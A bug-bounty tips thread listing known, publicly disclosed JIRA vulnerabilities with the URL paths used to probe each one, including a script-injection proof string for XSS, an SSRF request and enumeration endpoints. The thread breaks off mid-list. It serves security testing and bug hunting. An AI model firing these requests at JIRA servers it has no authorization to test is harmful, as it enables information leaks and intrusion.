#Learn365 Day-4: Unauthenticated & Exploitable JIRA Vulnerabilities
There are multiple security vulnerabilities associated with the various versions of JIRA software which are exploited in wild and is one of my personal favourite 3rd Party apps to hunt.
#BugBountyTips
(1/n)
(2/n)
1. CVE-2020-14179 (Information Disclosure)
a. Navigate to
/secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.
2. CVE-2020-14181 (User Enumeration)
a. Navigate to /secure/ViewUserHover.jspa?username=
(3/n)
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to /browse.
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.
(4/n)
4. CVE-2019-3402 (XSS)
a. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
5. CVE-2019-11581 (SSTI)
a. Navigate to /secure/ContactAdministrators!default.jspa
(5/n)
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
8. CVE-2019-8451 (SSRF)
a. Navigate to